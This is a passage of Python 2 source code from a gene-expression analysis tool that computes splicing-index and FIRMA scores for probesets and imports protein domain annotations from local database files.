            try: filtered_probeset_db[probeset]
            except KeyError: del fold_dbase[probeset]
    ### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing annotation)
    if filter_for_AS == 'yes':
        proceed = 0
        for probeset in exon_db:
            as_call = exon_db[probeset].SplicingCall()
            if as_call == 0:
                try: del fold_dbase[probeset]
                except KeyError: null=[]
    ### Used to the export relative individual adjusted probesets fold changes used for splicing index values
    if export_NI_values == 'yes':
        summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
        data = export.ExportFile(summary_output)
        title = string.join(['gene\tExonID\tprobesets']+original_array_names,'\t')+'\n'; data.write(title)
    print 'Calculating splicing-index values (please be patient)...',
    if array_type == 'RNASeq': id_name = 'exon/junction IDs'
    else: id_name = 'array IDs'
    ### NOTE(review): 'beging' below is a typo for 'being' in the status message (left as-is)
    print len(fold_dbase),id_name,'beging examined'
    ###original_avg_const_exp_db contains constitutive mean expression values per group: G6953871 [7.71, 7.66]
    ###array_raw_group_values: Raw expression values in list of groups: G7072464@J935416_RC@j_at ([1.79, 2.16, 2.22], [1.68, 2.24, 1.97, 1.92, 2.12])
    ###avg_const_exp_db contains the raw constitutive expression values in a single list
    ### Accumulators: (SI, ExonData) hits, excluded probesets (kept for DomainGraph) and the denominator count
    splicing_index_hash=[]; excluded_probeset_db={}; denominator_probesets=0; interaction = 0
    original_increment = int(len(exon_db)/20); increment = original_increment
    for probeset in exon_db:
        ed = exon_db[probeset]
        #include_probeset = ed.IncludeProbeset()
        if interaction == increment: increment+=original_increment; print '*',
        interaction +=1
        include_probeset = 'yes' ###Moved this filter to import of the probeset relationship file
        ###Examines user input parameters for inclusion of probeset types in the analysis
        if include_probeset == 'yes':
            geneid = ed.GeneID()
            if probeset in fold_dbase and geneid in original_avg_const_exp_db: ###used to search for array_raw_group_values, but when filtered by expression changes, need to filter by adj_fold_dbase
                denominator_probesets+=1
                ###Includes probesets with a calculated constitutive expression value for each gene and expression data for that probeset
                group_index = 0; si_interim_group_db={}; si_interim_group_str_db={}; ge_threshold_count=0; value_count = 0
                for group_values in array_raw_group_values[probeset]:
                    """gene_expression_value = math.pow(2,original_avg_const_exp_db[geneid][group_index])
                    ###Check to see if gene expression is > threshod for both conditions
                    if gene_expression_value>gene_expression_threshold:ge_threshold_count+=1"""
                    value_index = 0; ratio_hash=[]; ratio_str_hash=[]
                    for value in group_values: ###Calculate normalized ratio's for each condition and save raw values for later permutation
                        #exp_val = math.pow(2,value);ge_val = math.pow(2,avg_const_exp_db[geneid][value_count]) ###To calculate a ttest we need the raw constitutive expression values, these are not in group list form but are all in a single list so keep count.
                        exp_val = value;ge_val = avg_const_exp_db[geneid][value_count]
                        exp_ratio = exp_val-ge_val; ratio_hash.append(exp_ratio); ratio_str_hash.append(str(exp_ratio))
                        value_index +=1; value_count +=1
                    si_interim_group_db[group_index] = ratio_hash
                    si_interim_group_str_db[group_index] = ratio_str_hash
                    group_index+=1
                group1_ratios = si_interim_group_db[0]; group2_ratios = si_interim_group_db[1]
                group1_mean_ratio = statistics.avg(group1_ratios); group2_mean_ratio = statistics.avg(group2_ratios)
                if export_NI_values == 'yes':
                    try: er = ed.ExonID()
                    except Exception: er = 'NA'
                    ev = string.join([geneid+'\t'+er+'\t'+probeset]+si_interim_group_str_db[0]+si_interim_group_str_db[1],'\t')+'\n'; data.write(ev)
                #if ((math.log(group1_mean_ratio,2))*(math.log(group2_mean_ratio,2)))<0: opposite_SI_log_mean = 'yes'
                if (group1_mean_ratio*group2_mean_ratio)<0: opposite_SI_log_mean = 'yes'
                else: opposite_SI_log_mean = 'no'
                try:
                    if calculate_normIntensity_p == 'yes':
                        try:
                            normIntensityP = statistics.runComparisonStatistic(group1_ratios,group2_ratios,probability_statistic)
                        except Exception: normIntensityP = 'NA' ### Occurs when analyzing two groups with no variance
                    else: normIntensityP = 'NA' ### Set to an always signficant value
                    if normIntensityP == 1: normIntensityP = 'NA'
                    splicing_index = group1_mean_ratio-group2_mean_ratio; abs_splicing_index = abs(splicing_index)
                    #if probeset == '3061323': print abs_splicing_index,normIntensityP,ed.ExonID(),group1_mean_ratio,group2_mean_ratio,math.log(group1_mean_ratio,2),math.log(group2_mean_ratio,2),((math.log(group1_mean_ratio,2))*(math.log(group2_mean_ratio,2))),opposite_SI_log_mean; kill
                    ### Missing/unparsable MIDAS p-values default to 0, which passes the midas_p < p_threshold filter below
                    if probeset in midas_db:
                        try: midas_p = float(midas_db[probeset])
                        except ValueError:
                            midas_p = 0
                            #if abs_splicing_index>1 and normIntensityP < 0.05: print probeset,normIntensityP, abs_splicing_index;kill
                    else: midas_p = 0
                    #print ed.GeneID(),ed.ExonID(),probeset,splicing_index,normIntensityP,midas_p,group1_ratios,group2_ratios
                    if abs_splicing_index>alt_exon_logfold_cutoff and (normIntensityP < p_threshold or normIntensityP == 'NA' or normIntensityP == 1) and midas_p < p_threshold:
                        exonid = ed.ExonID(); critical_exon_list = [1,[exonid]]
                        constit_exp1 = original_avg_const_exp_db[geneid][0]
                        constit_exp2 = original_avg_const_exp_db[geneid][1]
                        ge_fold=constit_exp2-constit_exp1
                        ### Re-define all of the pairwise values now that the two Splicing-Index groups to report have been determined
                        data_list1 = array_raw_group_values[probeset][0]; data_list2 = array_raw_group_values[probeset][1]
                        baseline_exp = statistics.avg(data_list1); experimental_exp = statistics.avg(data_list2); fold_change = experimental_exp - baseline_exp
                        try:
                            ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
                        except Exception: ttest_exp_p = 1
                        normInt1 = (baseline_exp-constit_exp1); normInt2 = (experimental_exp-constit_exp2); adj_fold = normInt2 - normInt1
                        ped = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, '')
                        sid = ExonData(splicing_index,probeset,critical_exon_list,geneid,group1_ratios,group2_ratios,normIntensityP,opposite_SI_log_mean)
                        sid.setConstitutiveExpression(constit_exp1); sid.setConstitutiveFold(ge_fold); sid.setProbesetExpressionData(ped)
                        splicing_index_hash.append((splicing_index,sid))
                    else:
                        ### Also record the data for probesets that are excluded... Used by DomainGraph
                        eed = ExcludedExonData(splicing_index,geneid,normIntensityP)
                        excluded_probeset_db[probeset] = eed
                except Exception:
                    null = [] ###If this occurs, then most likely, the exon and constitutive probeset are the same
    print 'Splicing Index analysis complete'
    if export_NI_values == 'yes': data.close()
    splicing_index_hash.sort(); splicing_index_hash.reverse()
    print len(splicing_index_hash),id_name,"with evidence of Alternative expression"
    p_value_call=''; permute_p_values = {}; summary_data_db['denominator_exp_events']=denominator_probesets
    return splicing_index_hash,p_value_call,permute_p_values, excluded_probeset_db
def importResiduals(filename,probe_probeset_db):
    """Stream an APT residuals file and batch residual rows per gene.

    Each data row is keyed 'uid-probe'; rows appear to be grouped by uid
    (gene/metaprobeset), since the uid-change test below is what triggers a
    flush — TODO confirm the file is written gene-contiguously. When the uid
    changes, the accumulated probeset->residual-rows dict for the finished
    gene is handed to calculateFIRMAScores() and the accumulator is reset.
    Probes absent from probe_probeset_db (and any malformed rows) are
    silently skipped by the broad except. Leading '#' lines and the first
    header line are skipped.
    """
    fn=filepath(filename); key_db = {}; x=0; prior_uid = ''; uid_gene_db={}
    for line in open(fn,'rU').xreadlines():
        if x == 0 and line[0] == '#': null=[]
        elif x == 0: x+=1
        else:
            data = cleanUpLine(line)
            t = string.split(data,'\t')
            uid = t[0]; uid,probe = string.split(uid,'-')
            try:
                probeset = probe_probeset_db[probe]; residuals = t[1:]
                if uid == prior_uid:
                    try: uid_gene_db[probeset].append(residuals) ### Don't need to keep track of the probe ID
                    except KeyError: uid_gene_db[probeset] = [residuals]
                else: ### Hence, we have finished storing all residual data for that gene
                    if len(uid_gene_db)>0: calculateFIRMAScores(uid_gene_db); uid_gene_db={}
                    try: uid_gene_db[probeset].append(residuals) ### Don't need to keep track of the probe ID
                    except KeyError: uid_gene_db[probeset] = [residuals]
                    prior_uid = uid
            except Exception: null=[]
    ### For the last gene imported
    if len(uid_gene_db)>0: calculateFIRMAScores(uid_gene_db)
def calculateFIRMAScores(uid_gene_db):
    """Compute FIRMA scores for one gene's probesets and store them in the
    module-level firma_scores dict (probeset -> {sample_index: score}).

    For each probeset the median residual per sample index is taken, then
    divided by the gene-wide median absolute deviation (MAD) of all residuals
    for the gene. If the division raises (e.g. gene_MAD == 0), the raw median
    residual is left in place via the broad except below.
    """
    probeset_residuals={}; all_gene_residuals=[]; total_probes=0
    for probeset in uid_gene_db:
        residuals_list = uid_gene_db[probeset]; sample_db={}; total_probes+=len(residuals_list)
        ### For all probes in a probeset, calculate the median residual for each sample
        for residuals in residuals_list:
            index=0
            for residual in residuals:
                try: sample_db[index].append(float(residual))
                except KeyError: sample_db[index] = [float(residual)]
                all_gene_residuals.append(float(residual))
                index+=1
        for index in sample_db:
            median_residual = statistics.median(sample_db[index])
            sample_db[index] = median_residual
        probeset_residuals[probeset] = sample_db
    ### Calculate the Median absolute deviation
    """http://en.wikipedia.org/wiki/Absolute_deviation
    The median absolute deviation (also MAD) is the median absolute deviation from the median. It is a robust estimator of dispersion.
    For the example {2, 2, 3, 4, 14}: 3 is the median, so the absolute deviations from the median are {1, 1, 0, 1, 11} (or reordered as
    {0, 1, 1, 1, 11}) with a median absolute deviation of 1, in this case unaffected by the value of the outlier 14.
    Here, the global gene median will be expressed as res_gene_median.
    """
    res_gene_median = statistics.median(all_gene_residuals); subtracted_residuals=[]
    for residual in all_gene_residuals: subtracted_residuals.append(abs(res_gene_median-residual))
    gene_MAD = statistics.median(subtracted_residuals)
    #if '3263614' in probeset_residuals: print len(all_gene_residuals),all_gene_residuals
    for probeset in probeset_residuals:
        sample_db = probeset_residuals[probeset]
        for index in sample_db:
            median_residual = sample_db[index]
            try:
                firma_score = median_residual/gene_MAD
                sample_db[index] = firma_score
            except Exception: null=[]
            #if probeset == '3263614': print index, median_residual, firma_score, gene_MAD
        firma_scores[probeset] = sample_db
def importProbeToProbesets(fold_dbase):
    """Build probe->probeset maps for all genes under study and compute FIRMA
    scores in batches via importResiduals()/calculateFIRMAScores().

    Genes are processed in batches of max_gene_count to bound memory use.
    Beware the two similarly named dicts: probeset_probe_db maps probeset ->
    probes (loaded from the annotation file), while probe_probeset_db maps
    probe -> probeset (what importResiduals consumes). Exits via badExit()
    if the expected residuals file is missing.
    """
    #print "Importing probe-to-probeset annotations (please be patient)..."
    filename = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_probeset-probes.txt'
    probeset_to_include={}
    gene2examine={}
    ### Although we want to restrict the analysis to probesets in fold_dbase, we don't want to effect the FIRMA model - filter later
    for probeset in fold_dbase:
        try: ed = exon_db[probeset]; gene2examine[ed.GeneID()]=[]
        except Exception: null=[]
    for gene in original_avg_const_exp_db: gene2examine[gene]=[]
    for probeset in exon_db:
        ed = exon_db[probeset]; geneid = ed.GeneID()
        if geneid in gene2examine:
            gene2examine[geneid].append(probeset) ### Store these so we can break things up
            probeset_to_include[probeset]=[]
    probeset_probe_db = importGenericFilteredDBList(filename,probeset_to_include)
    ### Get Residuals filename and verify it's presence
    #print "Importing comparison residuals..."
    filename_objects = string.split(dataset_name[:-1],'.p'); filename = filename_objects[0]+'.txt'
    if len(array_group_list)==2:
        filename = import_dir = root_dir+'AltExpression/FIRMA/residuals/'+array_type+'/'+species+'/'+filename
    else: filename = import_dir = root_dir+'AltExpression/FIRMA/FullDatasets/'+array_type+'/'+species+'/'+filename
    status = verifyFile(filename)
    if status != 'found':
        print_out = 'The residual file:'; print_out+= filename
        print_out+= 'was not found in the default location.\nPlease make re-run the analysis from the Beginning.'
        try: UI.WarningWindow(print_out,'Exit')
        except Exception: print print_out
        print traceback.format_exc(); badExit()
    print "Calculating FIRMA scores..."
    input_count = len(gene2examine) ### Number of probesets or probeset pairs (junction array) alternatively regulated
    original_increment = int(input_count/20); increment = original_increment
    start_time = time.time(); x=0
    probe_probeset_db={}; gene_count=0; total_gene_count = 0; max_gene_count=3000; round = 1
    for gene in gene2examine:
        gene_count+=1; total_gene_count+=1; x+=1
        #if x == increment: increment+=original_increment; print '*',
        for probeset in gene2examine[gene]:
            for probe in probeset_probe_db[probeset]: probe_probeset_db[probe] = probeset
        if gene_count == max_gene_count:
            ### Import residuals and calculate primary sample/probeset FIRMA scores
            importResiduals(filename,probe_probeset_db)
            #print max_gene_count*round,"genes"
            print '*',
            gene_count=0; probe_probeset_db={}; round+=1 ### Reset these variables and re-run
    ### Clears the probeset->probes annotation dict (no longer needed); probe_probeset_db still holds the final batch
    probeset_probe_db={}
    ### Analyze residuals for the remaining probesets (< max_gene_count)
    importResiduals(filename,probe_probeset_db)
    end_time = time.time(); time_diff = int(end_time-start_time)
    print "FIRMA scores calculted for",total_gene_count, "genes in %d seconds" % time_diff
def FIRMAanalysis(fold_dbase):
    """The FIRMA method calculates a score for each probeset and for each samples within a group of arrays, independent
    of group membership. However, in AltAnalyze, these analyses are performed dependent on group. The FIRMA score is calculated
    by obtaining residual values (residuals is a variable for each probe that can't be explained by the GC content or intensity
    of that probe) from APT, for all probes corresponding to a metaprobeset (Ensembl gene in AltAnalyze). These probe residuals
    are imported and the ratio of the median residual per probeset per sample divided by the absolute standard deviation of the
    median of all probes for all samples for that gene.

    Returns (firma_hash, p_value_call, permute_p_values, excluded_probeset_db):
    firma_hash is a list of (FIRMA fold, ExonData) tuples sorted descending;
    p_value_call is '' and permute_p_values is {} (no permutation analysis here).
    Populates the module-level firma_scores dict via importProbeToProbesets()."""
    ### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing pattern)
    if len(filtered_probeset_db)>0:
        temp_db={}
        for probeset in fold_dbase: temp_db[probeset]=[]
        for probeset in temp_db:
            try: filtered_probeset_db[probeset]
            except KeyError: del fold_dbase[probeset]
    ### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing annotation)
    if filter_for_AS == 'yes':
        proceed = 0
        for probeset in exon_db:
            as_call = exon_db[probeset].SplicingCall()
            if as_call == 0:
                try: del fold_dbase[probeset]
                except KeyError: null=[]
    #print 'Beginning FIRMA analysis (please be patient)...'
    ### Used to the export relative individual adjusted probesets fold changes used for splicing index values
    if export_NI_values == 'yes':
        sample_names_ordered = [] ### note: Can't use original_array_names since the order is potentially different (FIRMA stores sample data as indeces within dictionary keys)
        for group_name in array_group_list: ### THIS LIST IS USED TO MAINTAIN CONSISTENT GROUP ORDERING DURING ANALYSIS
            for sample_name in array_group_name_db[group_name]: sample_names_ordered.append(sample_name)
        summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
        data = export.ExportFile(summary_output)
        title = string.join(['gene-probesets']+sample_names_ordered,'\t')+'\n'; data.write(title)
    ### Import probes for probesets to be analyzed
    global firma_scores; firma_scores = {}
    importProbeToProbesets(fold_dbase)
    print 'FIRMA scores obtained for',len(firma_scores),'probests.'
    ### Group sample scores for each probeset and calculate statistics
    firma_hash=[]; excluded_probeset_db={}; denominator_probesets=0; interaction = 0
    original_increment = int(len(firma_scores)/20); increment = original_increment
    for probeset in firma_scores:
        if probeset in fold_dbase: ### Filter based on expression
            ed = exon_db[probeset]; geneid = ed.GeneID()
            if interaction == increment: increment+=original_increment; print '*',
            interaction +=1; denominator_probesets+=1
            sample_db = firma_scores[probeset]
            ###Use the index values from performExpressionAnalysis to assign each expression value to a new database
            firma_group_array = {}
            for group_name in array_group_db:
                for array_index in array_group_db[group_name]:
                    firma_score = sample_db[array_index]
                    try: firma_group_array[group_name].append(firma_score)
                    except KeyError: firma_group_array[group_name] = [firma_score]
            ###array_group_list should already be unique and correctly sorted (see above)
            firma_lists=[]; index=0
            for group_name in array_group_list:
                firma_list = firma_group_array[group_name]
                ### For >2 groups each entry becomes a (avg, scores, group_index) tuple so sorting below picks the extremes
                if len(array_group_list)>2: firma_list = statistics.avg(firma_list), firma_list, index
                firma_lists.append(firma_list); index+=1
            if export_NI_values == 'yes': ### DO THIS HERE SINCE firma_lists IS SORTED BELOW!!!!
                try: er = ed.ExonID()
                except Exception: er = 'NA'
                export_list = [geneid+'\t'+er+'\t'+probeset]; export_list2=[]
                for firma_ls in firma_lists:
                    if len(array_group_list)>2: firma_ls =firma_ls[1] ### See above modification of firma_list object for multiple group anlaysis
                    export_list+=firma_ls
                for i in export_list: export_list2.append(str(i))
                ev = string.join(export_list2,'\t')+'\n'; data.write(ev)
            if len(array_group_list)==2:
                firma_list1 = firma_lists[0]; firma_list2 = firma_lists[-1]; firma_avg1 = statistics.avg(firma_list1); firma_avg2 = statistics.avg(firma_list2)
                index1=0; index2=1 ### Only two groups, thus only two indeces
            else: ### The below code deals with identifying the comparisons which yeild the greatest FIRMA difference
                firma_lists.sort(); index1=firma_lists[0][-1]; index2 = firma_lists[-1][-1]
                firma_list1 = firma_lists[0][1]; firma_list2 = firma_lists[-1][1]; firma_avg1 = firma_lists[0][0]; firma_avg2 = firma_lists[-1][0]
            if calculate_normIntensity_p == 'yes':
                try:
                    normIntensityP = statistics.runComparisonStatistic(firma_list1,firma_list2,probability_statistic)
                except Exception: normIntensityP = 'NA' ### Occurs when analyzing two groups with no variance
            else: normIntensityP = 'NA'
            if normIntensityP == 1: normIntensityP = 'NA'
            firma_fold_change = firma_avg2 - firma_avg1
            firma_fold_change = -1*firma_fold_change ### Make this equivalent to Splicing Index fold which is also relative to experimental not control
            if (firma_avg2*firma_avg1)<0: opposite_FIRMA_scores = 'yes'
            else: opposite_FIRMA_scores = 'no'
            ### Missing MIDAS p-values default to 0, which passes the midas_p < p_threshold filter below
            if probeset in midas_db:
                try: midas_p = float(midas_db[probeset])
                except ValueError: midas_p = 0
            else: midas_p = 0
            #if probeset == '3263614': print firma_fold_change, normIntensityP, midas_p,'\n',firma_list1, firma_list2, [p_threshold];kill
            if abs(firma_fold_change)>alt_exon_logfold_cutoff and (normIntensityP < p_threshold or normIntensityP == 'NA') and midas_p < p_threshold:
                exonid = ed.ExonID(); critical_exon_list = [1,[exonid]]
                #gene_expression_values = original_avg_const_exp_db[geneid]
                constit_exp1 = original_avg_const_exp_db[geneid][index1]
                constit_exp2 = original_avg_const_exp_db[geneid][index2]
                ge_fold = constit_exp2-constit_exp1
                ### Re-define all of the pairwise values now that the two FIRMA groups to report have been determined
                data_list1 = array_raw_group_values[probeset][index1]; data_list2 = array_raw_group_values[probeset][index2]
                baseline_exp = statistics.avg(data_list1); experimental_exp = statistics.avg(data_list2); fold_change = experimental_exp - baseline_exp
                group_name1 = array_group_list[index1]; group_name2 = array_group_list[index2]
                try:
                    ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
                except Exception: ttest_exp_p = 1
                normInt1 = (baseline_exp-constit_exp1); normInt2 = (experimental_exp-constit_exp2); adj_fold = normInt2 - normInt1
                ped = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, group_name2+'_vs_'+group_name1)
                fid = ExonData(firma_fold_change,probeset,critical_exon_list,geneid,data_list1,data_list2,normIntensityP,opposite_FIRMA_scores)
                fid.setConstitutiveExpression(constit_exp1); fid.setConstitutiveFold(ge_fold); fid.setProbesetExpressionData(ped)
                firma_hash.append((firma_fold_change,fid))
                #print [[[probeset,firma_fold_change,normIntensityP,p_threshold]]]
            else:
                ### Also record the data for probesets that are excluded... Used by DomainGraph
                eed = ExcludedExonData(firma_fold_change,geneid,normIntensityP)
                excluded_probeset_db[probeset] = eed
    print 'FIRMA analysis complete'
    if export_NI_values == 'yes': data.close()
    firma_hash.sort(); firma_hash.reverse()
    print len(firma_hash),"Probesets with evidence of Alternative expression out of",len(excluded_probeset_db)+len(firma_hash)
    p_value_call=''; permute_p_values = {}; summary_data_db['denominator_exp_events']=denominator_probesets
    return firma_hash,p_value_call,permute_p_values, excluded_probeset_db
def getFilteredFilename(filename):
    """For junction arrays, point at the '-filtered' variant of the file;
    other array types use the path unchanged."""
    if array_type == 'junction':
        return filename.replace('.txt','-filtered.txt')
    return filename
def getExonVersionFilename(filename):
    """Redirect junction/RNASeq database paths into their explicit_data_type
    subdirectory, keeping the original path when the redirected file is absent."""
    fallback = filename
    if (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type != 'null':
        filename = filename.replace(array_type, array_type+'/'+explicit_data_type)
        ### Make sure the redirected file exists, otherwise fall back
        #print [[filename,file_status]]
        if verifyFile(filename) != 'found':
            filename = fallback
    return filename
def importProbesetAligningDomains(exon_db,report_type):
    """Import probesets aligning directly or indirectly to protein domains.

    For junction-style analyses (AltMouse, or junction/RNASeq with
    explicit_data_type == 'null'), exon_db is first re-keyed from probeset
    pairs to 'gene:critical_exon' entries wrapped in SimpleJunctionData.
    Return value depends on report_type:
      'gene'          -> (len(gene_protein_ft_db), domain_gene_count_db)  [else branch]
      'perfect_match' -> probeset_aligning_db2 (id -> annotated domain string)
      'probeset'      -> (gene_protein_ft_db, domain_gene_count_db,
                         protein_functional_attribute_db)  [the last stays {} here]
    """
    filename = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_domain_aligning_probesets.txt'
    filename=getFilteredFilename(filename)
    probeset_aligning_db = importGenericDBList(filename)
    filename = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_indirect_domain_aligning_probesets.txt'
    filename=getFilteredFilename(filename)
    probeset_indirect_aligning_db = importGenericDBList(filename)
    if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
        new_exon_db={}; splicing_call_db={}
        for probeset_pair in exon_db:
            ### For junction analyses exon_db is really regulated_exon_junction_db, containing the inclusion,exclusion probeset tuple and an object as values
            ed = exon_db[probeset_pair]; geneid = ed.GeneID(); critical_exons = ed.CriticalExons()
            for exon in critical_exons:
                new_key = geneid+':'+exon
                try: new_exon_db[new_key].append(probeset_pair)
                except KeyError: new_exon_db[new_key] = [probeset_pair]
                try: splicing_call_db[new_key].append(ed.SplicingCall())
                except KeyError: splicing_call_db[new_key] = [ed.SplicingCall()]
        for key in new_exon_db:
            probeset_pairs = new_exon_db[key]; probeset_pair = probeset_pairs[0] ### grab one of the probeset pairs
            ed = exon_db[probeset_pair]; geneid = ed.GeneID()
            jd = SimpleJunctionData(geneid,'','','',probeset_pairs) ### use only those necessary fields for this function (probeset pairs will be called as CriticalExons)
            splicing_call_db[key].sort(); splicing_call = splicing_call_db[key][-1]; jd.setSplicingCall(splicing_call) ### Bug from 1.15 to have key be new_key?
            new_exon_db[key] = jd
        exon_db = new_exon_db
    gene_protein_ft_db={};domain_gene_count_db={};protein_functional_attribute_db={}; probeset_aligning_db2={}
    splicing_call_db=[]; new_exon_db=[] ### Clear memory
    ### Pass 1: domains the probeset aligns to directly
    for probeset in exon_db:
        #if probeset == '107650':
        #if probeset in probeset_aligning_db: print probeset_aligning_db[probeset];kill
        if probeset in probeset_aligning_db:
            proceed = 'no'
            if filter_for_AS == 'yes':
                as_call = exon_db[probeset].SplicingCall()
                if as_call == 1: proceed = 'yes'
            else: proceed = 'yes'
            gene = exon_db[probeset].GeneID()
            new_domain_list=[]; new_domain_list2=[]
            if report_type == 'gene' and proceed == 'yes':
                for domain in probeset_aligning_db[probeset]:
                    try: domain_gene_count_db[domain].append(gene)
                    except KeyError: domain_gene_count_db[domain] = [gene]
                    try: gene_protein_ft_db[gene].append(domain)
                    except KeyError: gene_protein_ft_db[gene]=[domain]
            elif proceed == 'yes':
                if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
                    probeset_list = exon_db[probeset].CriticalExons()
                else: probeset_list = [probeset]
                for id in probeset_list:
                    for domain in probeset_aligning_db[probeset]:
                        new_domain_list.append('(direct)'+domain)
                        new_domain_list2.append((domain,'+'))
                    new_domain_list = unique.unique(new_domain_list)
                    new_domain_list_str = string.join(new_domain_list,', ')
                    gene_protein_ft_db[gene,id] = new_domain_list2
                    probeset_aligning_db2[id] = new_domain_list_str
    #print exon_db['107650']
    ### Pass 2: domains the probeset aligns to indirectly (mirrors pass 1 with '(indirect)'/'-' markers)
    for probeset in exon_db:
        if probeset in probeset_indirect_aligning_db:
            proceed = 'no'
            if filter_for_AS == 'yes':
                as_call = exon_db[probeset].SplicingCall()
                if as_call == 1: proceed = 'yes'
            else: proceed = 'yes'
            gene = exon_db[probeset].GeneID()
            new_domain_list=[]; new_domain_list2=[]
            if report_type == 'gene' and proceed == 'yes':
                for domain in probeset_indirect_aligning_db[probeset]:
                    try: domain_gene_count_db[domain].append(gene)
                    except KeyError: domain_gene_count_db[domain] = [gene]
                    try: gene_protein_ft_db[gene].append(domain)
                    except KeyError: gene_protein_ft_db[gene]=[domain]
            elif proceed == 'yes':
                if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
                    probeset_list = exon_db[probeset].CriticalExons()
                else: probeset_list = [probeset]
                for id in probeset_list:
                    for domain in probeset_indirect_aligning_db[probeset]:
                        new_domain_list.append('(indirect)'+domain)
                        new_domain_list2.append((domain,'-'))
                    new_domain_list = unique.unique(new_domain_list)
                    new_domain_list_str = string.join(new_domain_list,', ')
                    gene_protein_ft_db[gene,id] = new_domain_list2
                    probeset_aligning_db2[id] = new_domain_list_str
    domain_gene_count_db = eliminate_redundant_dict_values(domain_gene_count_db)
    gene_protein_ft_db = eliminate_redundant_dict_values(gene_protein_ft_db)
    if analysis_method == 'ASPIRE' or analysis_method == 'linearregres':
        clearObjectsFromMemory(exon_db);exon_db=[]
        try: clearObjectsFromMemory(new_exon_db)
        except Exception: null=[]
        probeset_indirect_aligning_db=[]; probeset_aligning_db=[]
    if report_type == 'perfect_match':
        gene_protein_ft_db=[];domain_gene_count_db=[];protein_functional_attribute_db=[]
        return probeset_aligning_db2
    elif report_type == 'probeset':
        probeset_aligning_db2=[]
        return gene_protein_ft_db,domain_gene_count_db,protein_functional_attribute_db
    else:
        probeset_aligning_db2=[]; protein_functional_attribute_db=[]; probeset_aligning_db2=[]
        len_gene_protein_ft_db = len(gene_protein_ft_db); gene_protein_ft_db=[]
        return len_gene_protein_ft_db,domain_gene_count_db
def importProbesetProteinCompDomains(exon_db,report_type,comp_type):
    """Import protein domain/feature annotations for the probesets in exon_db.

    comp_type selects which pre-computed comparison files are read. Domain
    entries are 'domain|call' strings (the fallback split handles '|' inside
    UniProt annotations). When report_type == 'probeset', per-probeset domain
    and protein annotations are returned, with null/hit protein sequences
    appended where available; otherwise only the count of annotated genes
    plus the domain->genes tally is returned.
    """
    filename = 'AltDatabase/'+species+'/'+array_type+'/probeset-domain-annotations-'+comp_type+'.txt'
    if (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type != 'null': filename=getFilteredFilename(filename)
    filename=getExonVersionFilename(filename)
    probeset_aligning_db = importGeneric(filename)
    filename = 'AltDatabase/'+species+'/'+array_type+'/probeset-protein-annotations-'+comp_type+'.txt'
    if (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type != 'null': filename=getFilteredFilename(filename)
    filename=getExonVersionFilename(filename)
    gene_protein_ft_db={};domain_gene_count_db={}
    for probeset in exon_db:
        initial_proceed = 'no'; original_probeset = probeset
        if probeset in probeset_aligning_db: initial_proceed = 'yes'
        elif array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
            ### For junction analyses exon_db is really regulated_exon_junction_db, containing the inclusion,exclusion probeset tuple and an object as values
            if '|' in probeset[0]: probeset1 = string.split(probeset[0],'|')[0]; probeset = probeset1,probeset[1]
            try: alternate_probeset_id = exon_db[probeset].InclusionLookup(); probeset = alternate_probeset_id,probeset[1]
            except Exception: null=[]
            probeset_joined = string.join(probeset,'|')
            #print [probeset_joined],[probeset]
            ### Try the joined pair key first, then each member of the pair individually
            if probeset_joined in probeset_aligning_db: initial_proceed = 'yes'; probeset = probeset_joined
            elif probeset[0] in probeset_aligning_db: initial_proceed = 'yes'; probeset = probeset[0]
            elif probeset[1] in probeset_aligning_db: initial_proceed = 'yes'; probeset = probeset[1]
            #else: for i in probeset_aligning_db: print [i];kill
        if initial_proceed == 'yes':
            proceed = 'no'
            if filter_for_AS == 'yes':
                as_call = exon_db[original_probeset].SplicingCall()
                if as_call == 1: proceed = 'yes'
            else: proceed = 'yes'
            new_domain_list = []
            gene = exon_db[original_probeset].GeneID()
            if report_type == 'gene' and proceed == 'yes':
                for domain_data in probeset_aligning_db[probeset]:
                    try:
                        domain,call = string.split(domain_data,'|')
                    except Exception:
                        values = string.split(domain_data,'|')
                        domain = values[0]; call = values[-1] ### occurs when a | exists in the annotations from UniProt
                    try: domain_gene_count_db[domain].append(gene)
                    except KeyError: domain_gene_count_db[domain] = [gene]
                    try: gene_protein_ft_db[gene].append(domain)
                    except KeyError: gene_protein_ft_db[gene]=[domain]
            elif proceed == 'yes':
                for domain_data in probeset_aligning_db[probeset]:
                    try: domain,call = string.split(domain_data,'|')
                    except Exception:
                        values = string.split(domain_data,'|')
                        domain = values[0]; call = values[-1]
                    new_domain_list.append((domain,call))
                    #new_domain_list = string.join(new_domain_list,', ')
                gene_protein_ft_db[gene,original_probeset] = new_domain_list
    domain_gene_count_db = eliminate_redundant_dict_values(domain_gene_count_db)
    probeset_aligning_db=[] ### Clear memory
    probeset_aligning_protein_db = importGeneric(filename)
    probeset_pairs={} ### Store all possible probeset pairs as single probesets for protein-protein associations
    for probeset in exon_db:
        if len(probeset)==2:
            for p in probeset: probeset_pairs[p] = probeset
    if report_type == 'probeset':
        ### Below code was re-written to be more memory efficient by not storing all data in probeset-domain-annotations-*comp*.txt via generic import
        protein_functional_attribute_db={}; probeset_protein_associations={}; protein_db={}
